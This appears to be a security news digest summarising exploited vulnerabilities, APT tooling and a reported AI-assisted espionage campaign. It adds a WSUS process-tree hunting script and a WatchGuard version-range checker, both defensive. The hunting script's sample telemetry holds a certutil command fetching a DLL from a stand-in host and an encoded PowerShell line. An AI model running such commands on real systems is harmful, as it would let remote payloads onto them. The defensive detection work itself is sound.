Fortinet FortiWeb exploited

FortiWeb under pressure: patch now, not later. Fortinet warned that FortiWeb has an OS command injection vulnerability (CVE-2025-58034) exploited in the wild, alongside a separate, more severe path traversal (CVE-2025-64446); both are fixed in 8.0.2. The path traversal lets an unauthenticated attacker run administrative commands on the appliance, while the command injection lets an attacker who already has a valid login execute OS commands on the underlying system. Customers should upgrade to patched versions immediately and review logs for compromise […]

Read More

7-Zip exploitation alert

7-Zip: tidy little utility, messy little bug. A 7-Zip flaw (CVE-2025-11001) in the handling of symbolic links inside archives, which can make extraction write outside the intended directory, has drawn urgent warnings. The Hacker News notes advisories that said the bug is being exploited, with fixes in 7-Zip 25.00. Admins should upgrade and be cautious opening archives from untrusted sources. (Note: subsequent NHS updates clarified they’d seen PoC availability […]

Read More

Grafana CVSS 10 SCIM flaw

Grafana CVSS 10.0 SCIM flaw: Grafana fixed a CVSS 10.0 vulnerability in SCIM user provisioning (Enterprise editions with SCIM provisioning enabled) that could let an attacker sign in as an existing user, including an admin. The bug was discovered internally on 4 Nov 2025; patches followed quickly. Grafana Cloud wasn’t affected. Admins should upgrade to the fixed versions immediately and review access logs for suspicious logins. This […]

Read More

Oracle Identity Manager 0day

Oracle Identity Manager under fire: CISA sounds the alarm. CISA added a critical Oracle Identity Manager flaw to the Known Exploited Vulnerabilities (KEV) catalogue, citing live attacks. The issue (CVSS 9.8) enables unauthenticated remote code execution and full takeover of identity infrastructure if left unpatched. Agencies must remediate by the KEV deadline; enterprises should treat […]

Read More

ShadowPad via WSUS

WSUS abused to drop ShadowPad: patch first, ask questions after. Threat actors are abusing a freshly patched WSUS flaw (CVE-2025-59287, a deserialization bug giving remote code execution as SYSTEM) to push ShadowPad malware and gain full SYSTEM access. Reports note attackers chaining living-off-the-land tools (PowerShell, certutil, curl) and DLL side-loading to land ShadowPad after the initial WSUS abuse. Mitigation is straightforward: apply Microsoft’s out-of-band […]
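The chain described above (WSUS process, then cmd/PowerShell/certutil/curl) is what a hunt should key on. Below is an added example, not code from the original page or from any of the cited reports, that walks a process tree and flags living-off-the-land binaries whose ancestry leads back to a WSUS process. The parent names (wsusservice.exe, and w3wp.exe running the "WsusPool" application pool), the hop limit and the sample events are assumptions made for the example; confirm the names against your own WSUS server before deploying it.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumed WSUS-side processes: the WSUS service and the IIS worker for its app pool.
WSUS_SERVICE = "wsusservice.exe"
IIS_WORKER = "w3wp.exe"
WSUS_APP_POOL = "wsuspool"          # default WSUS IIS application pool name (assumed)

# Living-off-the-land binaries the reports describe being chained after WSUS abuse.
LOLBINS = {"powershell.exe", "cmd.exe", "certutil.exe", "curl.exe"}


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 / EDR telemetry style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_wsus_process(proc: ProcEvent) -> bool:
    name = _basename(proc.image)
    if name == WSUS_SERVICE:
        return True
    # w3wp.exe hosts many app pools; only the WSUS pool is interesting.
    return name == IIS_WORKER and WSUS_APP_POOL in proc.cmdline.lower()


def find_wsus_lolbin_chains(events: List[ProcEvent], max_hops: int = 3) -> List[Tuple[int, str, str]]:
    """Return (pid, ancestry chain, cmdline) for every LOLBin that descends from a
    WSUS process within max_hops ancestors. Intermediate hops (e.g. cmd.exe between
    wsusservice.exe and powershell.exe) are followed, so both hops get reported."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits: List[Tuple[int, str, str]] = []
    for e in events:
        if _basename(e.image) not in LOLBINS:
            continue
        chain = [_basename(e.image)]
        parent: Optional[ProcEvent] = by_pid.get(e.ppid)
        hops = 0
        while parent is not None and hops < max_hops:
            chain.append(_basename(parent.image))
            if _is_wsus_process(parent):
                hits.append((e.pid, " <- ".join(chain), e.cmdline))
                break
            parent = by_pid.get(parent.ppid)
            hops += 1
    return hits


# Constructed sample telemetry for the example (not real captured data).
SAMPLE_EVENTS = [
    ProcEvent(1200, 900, r"C:\Program Files\Update Services\Service\WsusService.exe", "WsusService.exe"),
    ProcEvent(2100, 1200, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "powershell -enc SQBFAFgA..."'),
    ProcEvent(2150, 2100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -enc SQBFAFgA..."),
    ProcEvent(1300, 800, r"C:\Windows\System32\inetsrv\w3wp.exe", 'w3wp.exe -ap "WsusPool" -v "v4.0"'),
    ProcEvent(3100, 1300, r"C:\Windows\System32\certutil.exe", "certutil -urlcache -split -f http://example.invalid/a.dll"),
    ProcEvent(4000, 4500, r"C:\Windows\explorer.exe", "explorer.exe"),            # benign user shell
    ProcEvent(4100, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell"),  # benign admin use
]


def sample_hits() -> List[Tuple[int, str, str]]:
    return find_wsus_lolbin_chains(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, chain, cmd in sample_hits():
        print(f"pid {pid}: {chain}\n    {cmd}")
```

On the sample data this reports the cmd.exe and PowerShell spawned under WsusService.exe and the certutil spawned under the WsusPool worker, and ignores the PowerShell launched from an interactive explorer.exe session. Tune max_hops upward if your telemetry shows attackers inserting extra intermediate shells.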

Read More

ToddyCats new tools

ToddyCat’s new party trick: stealing your tokens (and your Outlook). Security researchers say the APT “ToddyCat” has upgraded its toolkit to pinch Outlook mail and Microsoft 365 access tokens. Fresh modules are tuned to the job: TomBerBil swipes browser cookies and saved credentials (Chrome/Edge), while TCSectorCopy lifts locked Outlook mailbox files directly from disk, helping the group persist […]

Read More

Active Directory Under Siege

Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security. The piece argues that Active Directory remains the crown-jewel target across enterprises and critical infrastructure. Complexity, legacy protocols and slow patch cycles (including a major 2025 privilege-escalation flaw) keep AD vulnerable. It recommends identity-first Zero Trust, privileged access tiering, hardening Kerberos/NTLM, rapid patching of domain […]

Read More

CISA Flags Critical WatchGuard Flaw

CISA Flags Critical WatchGuard Fireware Flaw (CVE-2025-9242). CISA added CVE-2025-9242 to its KEV catalogue; internet-wide scans by Shadowserver put the number of exposed WatchGuard Fireboxes at 54,000+. The flaw is an out-of-bounds write in the iked process (the IKEv2 VPN daemon) that can enable unauthenticated remote code execution; a device is reachable only when it has an IKEv2 VPN configured, so appliances that don't use IKEv2 are not exposed. Affected Fireware versions span 11.10.2–11.12.4_U1, 12.0–12.11.3 and 2025.1. WatchGuard patched in September; agencies and enterprises should update, […]
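The affected ranges above mix three numbering styles (11.x with an `_U1` update suffix, plain 12.x, and the year-based 2025.1), so a quick "is my build in range?" check needs a small parser rather than string comparison. The following is an added example written for this page, not WatchGuard's or CISA's own tooling; it treats `_U<n>` / `_Update<n>` as a fourth version component and compares inclusively against the ranges quoted above. The version strings in the test data are constructed.

```python
import re
from typing import List, Tuple

# Inclusive affected ranges as quoted in the summary above.
AFFECTED_RANGES: List[Tuple[str, str]] = [
    ("11.10.2", "11.12.4_U1"),
    ("12.0", "12.11.3"),
    ("2025.1", "2025.1"),
]

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:_(?:U|Update)(\d+))?", re.IGNORECASE)


def parse_fireware(version: str) -> Tuple[int, int, int, int]:
    """Turn '11.12.4_U1', '12.11.3' or '2025.1' into a comparable tuple
    (major, minor, patch, update); missing parts are 0."""
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised Fireware version string: {version!r}")
    major, minor, patch, update = m.groups()
    return (int(major), int(minor), int(patch or 0), int(update or 0))


def is_in_affected_range(version: str) -> bool:
    """True if the build falls inside one of the published affected ranges."""
    v = parse_fireware(version)
    return any(parse_fireware(lo) <= v <= parse_fireware(hi) for lo, hi in AFFECTED_RANGES)


def triage(versions: List[str]) -> List[Tuple[str, bool]]:
    """Label each build string; unparsable strings are reported as affected=True
    so they are reviewed by hand rather than silently dropped."""
    out = []
    for s in versions:
        try:
            out.append((s, is_in_affected_range(s)))
        except ValueError:
            out.append((s, True))
    return out


if __name__ == "__main__":
    for build, flagged in triage(["12.11.3", "12.11.4", "11.12.4_U1", "11.12.4_Update2", "2025.1", "2025.1.1"]):
        print(f"{build:16} {'IN RANGE' if flagged else 'outside'}")
```

A True result is a prompt to check WatchGuard's advisory for your model, not proof of exposure: the advisory also lists model-specific fixed builds whose numbers fall inside the 12.x range, and, as noted above, only appliances with IKEv2 VPN configured are reachable through the bug.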

Read More

Chinese Hackers Use AI to Launch Automated Espionage

Chinese Hackers Use Anthropic’s AI to Launch Automated Espionage. Anthropic reports China-linked actors abused its AI (Claude) to run a largely automated cyber-espionage campaign against ~30 organisations in September 2025. Researchers say 80–90% of operations were automated, with AI assisting reconnaissance, exploitation and data handling. Some intrusions succeeded before detection and disruption. The incident spotlights […]

Read More